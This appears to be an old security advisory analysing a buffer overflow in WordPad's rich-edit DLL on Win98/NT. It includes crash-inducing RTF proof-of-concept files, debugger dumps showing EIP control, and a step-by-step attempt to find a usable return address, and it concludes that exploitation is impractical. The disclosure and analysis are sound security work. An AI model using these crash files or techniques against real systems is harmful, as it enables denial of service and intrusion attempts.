COMMAND
WordPad/riched20.dll
SYSTEMS AFFECTED
Win98/NT
PROBLEM
This is not a security issue. No exploit possible. However,
it's good reading and it is recommanded.
Pauli Ojanpera found following. Win98/NT4 Riched20.dll (which
WordPad uses) has a classic buffer overflow problem with
".rtf"-files.
Crashme.rtf :
{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
A malicious document may probably abuse this to execute arbitary
code. WordPad crashes with EIP=41414141.
Thomas Dullien added. His code looks like this when viewed in
notepad:
{\rtf1\ansi\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1031\pard\plain\f2\fs20 HOLA :)
\par }
If you're looking for simplicity:
{rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbcde}
and you will get 0x45444342 in EIP after crash.
Gerardo Richarte has been playing with this since yesterday. Just
today could make the buffer overflow with EIP pointing to
0x61616161, BUT... (of course, what did you expected?), first
what's first (demo):
---------- kk.rtf -----------------------------
{\rtf1\abcdefghijklmnaabbstuvwxyzabcdefghijklmnccddstuvwxyzabcdefghijklmneeffstuvwxyzabcdefghijklmngghhstuvwxyzabcdefghijklmniijjstuvwxyzabcdefghijklmnkkllstuvwxyzabcdefghijklmnmmnnstuvwxyzansi\deff0\deftab720{\fonttbl{\f0\fswiss
MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New
Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1033\pard\plain\f2\fs20 hola
\par }
^@
-----------------------------------------------
It's a standard RTF file for the text 'hola', plus, an inserted
string ('abcde....xyz') befor the string 'ansi'. ccdd' is the
return address (EIP) If the string ansi is missing (i tested with
some other strings, not every other string...) nothing 'good'
happens. Any non letter character befor the string 'ccdd' makes
nothing happen. Not sure which characters can be in this
section of the .RTF. If uppercase letters are used, they are
lowercased (at least the return address)
Jason don't know the opcodes for an intel processor but has
control of the stack. So if some Assembly guru will fill in the
empty space with some interesting opcodes we are in business. The
following contents of an rtf document:
{\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQRSTUVWXYZ0AABBCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZAAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAAABBBBBCCCCCDDDDDEEEEEFFFFFGGGGGHHHHHIIIIIJJJJJKKKKKLLLLLMMMMMNNNNNOOOOOPPPPPQQQQQRRRRRSSSSSTTTTTUUUUUVVVVVWWWWWXXXXXYYYYYZZZZZ}
will cause the following the following dump:
WORDPAD caused an invalid page fault in
module <unknown> at 00de:41414141.
Registers:
EAX=00000102 CS=017f EIP=41414141 EFLGS=00010212
EBX=0056e364 SS=0187 ESP=0056e324 EBP=00000409
ECX=0056e364 DS=0187 ESI=0056e364 FS=57a7
EDX=fffffff3 ES=0187 EDI=0056e418 GS=609e
Bytes at CS:EIP:
Stack dump:
44434241 48474645 4c4b4a49 504f4e4d 54535251 58575655 00005a59 00500f1c
00000000 00000000 00000000 00500e90 480268ad 00500f40 00500e90 80000002
Notice that we control EIP (41414141, all As) and the the first
part of the stack is also under our control (44434241 48474645 =
DCBA HGFE) this is reversed because of the way the i386
architecture stores memory pointers.
In NT WordPad crashes with lowercased alphas as opposed to upcase
in 98. That's why some people get 41414141 and some get 61616161.
MSDN Library has been updated with a more sensible example of a
RTF parser.
Solar Eclipse made great job by examinating this issue. Ok,
let's try to exploit this shit. First, try to crash Wordpad.
Create the following file:
{\rtf\AAAAAAAAAA(100 'A's)}
Solar was using SoftIce to inspect the situation after the crash.
First, take a look at the registers and the stack.
EIP=61616161
ESP=0012F044
EBP=61616161
ebp eip
0023:0012F024 0012F104 00000102 61616161 61616161 ........aaaaaaaa
0023:0012F034 0000001B 00000246 0012F044 00000023 ....F...D...#...
0023:0012F044 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F054 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F064 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F074 61616161 61616161 00000000 00000000 aaaaaaaa........
We can assume that EBP and EIP were popped from the stack and then
RET 10 was executed, decreasing the stack pointer. To check if
this is the case, try the following:
{\rtf\AAAABBBBCCCCDDDDEEEEFFFF(...to ZZZZ)}
Wordpad crashes again. The regiters and the stack are as follows:
ESP=0012F054
EBP=6A6A6A6A 'jjjj'
EIP=6B6B6B6B 'kkkk'
ebp eip
0023:0012F034 0012F114 00000102 6a6a6a6a 6b6b6b6b ........jjjjkkkk
0023:0012F044 0000001B 00000246 0012F054 00000023 ....F...D...#...
0023:0012F054 6C6C6C6C 6D6D6D6D 6E6E6E6E 6F6F6F6F llllmmmmnnnnoooo
0023:0012F064 70707070 71717171 72727272 73737373 ppppqqqqrrrrssss
0023:0012F074 74747474 75757575 76767676 77777777 ttttuuuuvvvvwwww
0023:0012F084 78787878 79797979 7A7A7A7A 00000200 xxxxyyyyzzzz....
Yes, our assumption was correct. EBP gets its value from
0012F03C, and the RET 10 instruction gets the EIP from 0012F040.
The buffer is probably 36 characters big, because 'jjjj'
overwrites it. By the way, notice that the characters are
lowercased. This means that the buffer is lowercased before the
crash. Let's try the following file (36 characters):
{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIII}
It shouldn't crash, but it does. This is strange. Take a look at
the registers and the stack: (btw, do a quick check with 35
characters - Wordpad will not crash)
EIP=002E0033
ESP=0012F108
EBP=00200067
0023:0012F0E8 0012F294 6E002F02 00200067 002E0033 ...../.ng. .3...
0023:0012F0F8 0000001B 00000202 0012F108 00000023 ............#...
0023:0012F108 0020002E 006C0070 00610065 00650073 .. .p.l.e.a.s.e.
0023:0012F118 00770020 00690061 00000074 00000000 .w.a.i.t.......
0023:0012F128 00000000 00000000 0000002E 00000000 ................
0023:0012F138 0012F194 5F816876 00000014 00000000 ....vh._........
0023:0012F148 00000000 00000001 029AE0CD 00000064 ............d...
0023:0012F158 0012F1B8 0012F68C 0012F638 5F816850 ........8...Ph._
0023:0012F168 00C14812 00000000 0012F2A4 00000168 .H..........h...
0023:0012F178 0012F292 0012F290 00C15810 0012F1A8 .........X......
0023:0012F188 00C15B3A 00000007 00000006 0012F1CC :[..............
0023:0012F198 6C026878 0012F294 0012F290 00C11DC8 xh.l............
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....
This is even more strange. The EBP and EIP are not overwritten
by our string, but they are still smashed. It's time to try to
find where exactly is the code, guilty for this mess. Notice
that the EIP is overwritten and we don't know what code was
executed before the crash. Pauli Ojanpera posted that the crash
was in riched20.dll. Check the loaded DLL-s: there is no
riched20.dll, but we see riched32.dll. This sounds good! At what
address is this DLL loaded?
:map32 riched32
Owner Obj Name Obj# Address Size Type
RICHED32 .text 0001 001B:6C001000 00027284 CODE RO
The code is loaded at 6C001000. Where is the buffer overflow? It
is probably located in some function in RICHED32.DLL. This
function is probably called from some other function, which is
also called from somewhere. We should be able to see the return
addresses for these previous calls on the stack. Let's search
for something that looks like a return address. At 0012F1D0 we
see the bytes 6C026B81. This looks like an address in
RICHED32.DLL, doesn't it? Go diassemble the bastard! It is part
of a function, starting at 6C026B0B and ending at 6C026B68
(incuded some more code in the middle, more about it later)
001B:6C026B0B push ebp
001B:6C026B0C mov ebp, esp
001B:6C026B0E sub esp, 04
...
001B:6C026B7A mox ecx, esi
001B:6C026B7C call 6C0267D1 ; this is called for each \ tag
001B:6C026B81 mov [edi], eax
...
001B:6C026B64 pop edi
001B:6C026B65 pop esi
001B:6C026B66 mov esp, ebp
001B:6C026B68 ret
Put a breakpoint in the beginning of this function and see what
happens. The 6C026B0B function is called 2 times and crashes the
second time. Trace it step by step, stepping over the calls.
The function crashes after the final RET instruction (located at
6C026B68). Just before the crash the stack lools like this:
edi esi local_var old_ebp
0023:0012F1D4 0012F290 00C13D58 5CC15A30 0012F40C
0023:0012F1E4 6C024DE0 <- ret address
The POP EDI and POP ESI instructions restore these two registers
(look at the disassembly). Then the function restores the ESP
(which is saved in EBP in the beginning of the function). By
trying this with a normal RTF file (not causing a buffer
overflow), we see that ESP becomes 0012F1E0. Then EBP is popped
from the stack (it becomes 0012F40C) and the RET instruction
returnes the execution flow to 6C024DE0. This is not the case
with a fucked up RTF file. Everything is ok until we hit the MOV
ESP, EBP instruction. The value in the EBP register is not
correct, thus fucking up the ESP and causing a mess.
Ok, now we need to find where in the 6C026B0B function the EBP is
smashed. Put a breakpoint in the beginning of the function and
trace it (without stepping into the calls). The EBP in the
beginning of the function is 0012F1E0. It changes after the CALL
6C0267D1 instrcution. Now we have the function that changes the
EBP.
001B:6C0267D1 push ebp
001B:6C0267D2 mov ebp, esp
001B:6C0267D4 sub esp, 24
...
The stack of this function looks like this:
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 0012F1E0 6C026B81 0012F290 iii}.....k.l....
ebp eip
At 0012F1D4 we have the return address. The EBP is saved at
0012F1D0 and then the stack pointer is decremented by 36, leaving
space for 36 bytes of local variables. Remember this number?
This is our buffer! After some more tracing, we see that the
saved ebp is changed because of 001B:6C0268E9 mov byte ptr [ebx],
00 executed right after the buffer is filled with our characters.
This is a NULL termination of the string, which changes the saved
ebp from 0012F1D0 to 0012F100. Let's do some more reverse
engineering. From 6C0268AE to 6C0268DB we have a loop that reads
our string and copies it into the buffer.
001B:6C0268AE mov al, [ecx] ; get the current char
001B:6C0268B0 inc ecx ; ecx points to the next char
001B:6C0268B1 mov [ebp-01], al ; store the current char at 0012F1C8
001B:6C0268B4 mov [esi+1C], ecx ; store ecx at 0012F2AC
001B:6C0268B7 mov eax, 00000001 ; what the fuck?
001B:6C0268BC test eax, eax
001B:6C0268BE jc 6C0268E9 ; this is never executed
001B:6C0268C0 movzx eax, byte ptr [ebp-01] ; get the current char
001B:6C0268C4 test byte ptr [eax+6C00C6B8], 01 ; is is 'A'-'Z' or 'a'-'z' ?
001B:6C0268CB jz 6C0268E9 ; no -> go there
001B:6C0268CD mov al, [ebp-01] ; get the current char
001B:6C0268D0 or al, 20 ; make it lowercase
001B:6C0268D2 mov [ebx], al ; store it in the buffer
001B:6C0268D4 inc ebx
001B:6C0268D5 mov ecx, [esi+1c] ; restore ecx
001B:6C0268D8 cmp [esi+18], ecx ; reached the end of the sting?
001B:6C0268DB jnz 6C0268AE ; no -> loop again
ECX is a pointer to the memory location where the RTF file is
loaded. It points to the character that we are currently copying.
EBX points to the buffer. The buffer starts at 0012F1A8.
By the way, notice that the current charcacter is stored at
0012F1C8 (the third line in the disassembly). This means that
out buffer is only 32 bytes long, and we have another local
variable after it. This doesn't really matter, because the
copying process works even if we overwrite this variable (it gets
restored). If we put some shellcode there, we need to know that
this particular byte will be changed to the first character after
the end of the string. In our case, this is '}'
Notice the "test byte ptr [eax+6C00C6B8], 01" instruction. At this
memory location (6C00C6B8) we have an array of bytes,
corresponding to each ASCII value.
The array at 6C00C6B8
+00 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+30 06 06 06 06 06 06 06 06-06 06 00 00 00 00 00 00
+40 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+50 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+60 00 05 05 05 05 05 05 01-01 01 01 01 01 01 01 01
+70 01 01 01 01 01 01 01 01-01 01 01 00 00 00 00 00
+80 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+A0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+B0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+C0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+D0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+E0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
+F0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
The only ASCII characters that will pass the JZ condition after
the TEST instruction are the letters 'A'-'Z' and 'a'-'z' (ASCII
values 41-5A and 61-7A). If any other character is reached, the
copying is ended and the buffer is NULL terminated. Next we try
really taking over the return address.
{\rtf\AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKAAAAAAAAAAAAAAAAA(more As)}
'jjjj' overwrites the saved EBP and the return address becomes
'kkkk'. After the overwritten return address, we have more As.
0023:0012F1A8 61616161 62626262 63636363 64646464 aaaabbbbccccdddd
0023:0012F1B8 65656565 66666666 67676767 68686868 eeeeffffgggghhhh
0023:0012F1C8 7D696969 70707070 71717171 61616161 iii}jjjjkkkkaaaa
0023:0012F1D8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1E8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F1F8 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F208 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F218 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F228 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F238 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F248 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F258 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F268 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F278 61616161 61616161 61616161 61616161 aaaaaaaaaaaaaaaa
0023:0012F288 61616161 61616161 00000000 00000000 aaaaaaaa........
0023:0012F298 00000000 00000000 00000000 00000000 ................
0023:0012F2A8 00000000 000C1814 00000000 00000000 ................
At 0012F2AC we have a pointer to the current character in the file
buffer. ECX is saved to this location (referenced as esi+1C)
before the copying, and restored afterwards. This value is
updated after every copied byte. If we overwrite it, it will
start pointing to a new memory location. The copy loop will try
to read the bytes to copy from there and probably crash. Even if
we somehow manage to overwrite this with a valid memory pointer,
this will be the last byte copied from our string. This limits us
to 216 'A's after the 'jjjjkkkk'.
Exploiting this buffer overflow will be hard. May be not
impossible, but very hard. We have only 216 bytes to squeese our
shell code in, and we can use 26 characters - the letters from
'a' to 'z'. Writing a shell code with no nulls is hard, writing
one only with letters is almost impossible. First, we need some
way of pointing the return address to something usefull. We
cannot point it to the stack, because the stack address contains
'prohibited' characters. After the RET instruction the ESP points
to the second part of our string (the one after 'jjjjkkkk'). We
need a JMP ESP or CALL ESP instruction. The usual approach is to
look at the loaded DLL-s at the time of the crash and to find one
of these instructions at some memory location. Then we can point
the return address to this memory location and have it jump back
to our shell code. The problem is that we need the address of
this memory location to consist only of lowercase letters.
c:\>listdlls.exe wordpad
ListDLLs V2.1
Copyright (C) 1997-1999 Mark Russinovich
http://www.sysinternals.com
------------------------------------------------------------------------------
WORDPAD.EXE pid: 275
Base Size Version Path
0x029a0000 0x34000 4.00.1381.0096 C:\Program Files\Windows NT\Accessories\wordpad.exe
0x77f60000 0x5e000 4.00.1381.0174 C:\WINNT\System32\ntdll.dll
0x5f800000 0xee000 4.21.0000.7160 C:\WINNT\System32\MFC42u.DLL
0x78000000 0x40000 6.00.8397.0000 C:\WINNT\system32\MSVCRT.dll
0x77f00000 0x5e000 4.00.1381.0178 C:\WINNT\system32\KERNEL32.dll
0x77ed0000 0x2c000 4.00.1381.0115 C:\WINNT\system32\GDI32.dll
0x77e70000 0x54000 4.00.1381.0133 C:\WINNT\system32\USER32.dll
0x77dc0000 0x3f000 4.00.1381.0203 C:\WINNT\system32\ADVAPI32.dll
0x77e10000 0x57000 4.00.1381.0193 C:\WINNT\system32\RPCRT4.dll
0x77d80000 0x32000 4.00.1381.0133 C:\WINNT\system32\comdlg32.dll
0x70970000 0x1a8000 4.72.3110.0006 C:\WINNT\system32\SHELL32.dll
0x70bd0000 0x44000 5.00.2314.1000 C:\WINNT\system32\SHLWAPI.dll
0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll
0x77b20000 0xb6000 4.00.1381.0190 C:\WINNT\system32\ole32.dll
0x76aa0000 0x6000 4.00.1371.0001 C:\WINNT\System32\INDICDLL.dll
0x77c00000 0x18000 4.00.1381.0027 C:\WINNT\System32\WINSPOOL.DRV
0x775a0000 0x14000 0.02.0000.0000 C:\WINNT\System32\spool\DRIVERS\W32X86\2\RASDDUI.DLL
0x6c000000 0x2e000 4.00.0993.0004 C:\WINNT\System32\RICHED32.dll
0x70400000 0x77000 5.00.2314.1000 C:\WINNT\System32\mlang.dll
These are the loaded DLLs that we can use. The perfect DLL would
be the same on Windows 95, 98, SE, NT 4 with all service packs
and on Win2K. Unfortunately such DLL is just a dream. Our
choices are really limited. Looking at the base addresses, we can
eliminate most of the DLLs, because they don's have letter
addresses. This leaves us only with one DLL that we can use:
0x71590000 0x87000 5.80.2314.1000 C:\WINNT\system32\COMCTL32.dll
We can only use the code in the range from from 71616161 to
7161707A. After disassembling the DLL and looking at the code,
we clearly see that there is no JMP ESP or CALL ESP instruction.
There is no way to execute the shellcode. Even if we could do
it, making the shellcode do something usefull would be pain in
the ass. The restrictions are too harsh.
After the RET instruction, at ESP-50 we have a pointer to the
beginning of the buffer, where the raw file is loaded. This
buffer holds the raw file contents, so we can use NULLs and
non-letter characters. Unfortunately, this buffer is in the heap
and we can not execute any code from there. We need to copy the
code to the stack first.
Ussr Labs found found SOME ways to CRASH (no exploit possibly),
in another place in the format rft, in the richie20.dll, making a
EATER OF STACK inside in the rtf file. Example rtf code:
{\rtf1\ansi\ansicpg1252\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1
\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}{\f3\froman Times New Roman;}}
{\colortbl\red0\green0\blue0;}
\deflang1033\horzdoc{\*\fchars }{\*\lchars }\pard\plain\f2\fs20
hello!!!!{\object\objemb{\*\objclass WordPad.Document.1}{\*\objname
Object1}\objw11115\objh293
{\*\objdata
BUFFER)
}}}\plain\f2\fs20 !!!!!!!!!!!!!!!!
\par }
where buffer is like 9k of (123456789abcdefghijklmnopqrstuvwyz).
But its just eat the stack, OLE crash, and not are possibly make
exploit on this.
SOLUTION
Nothing yet. And nothing will be. This time.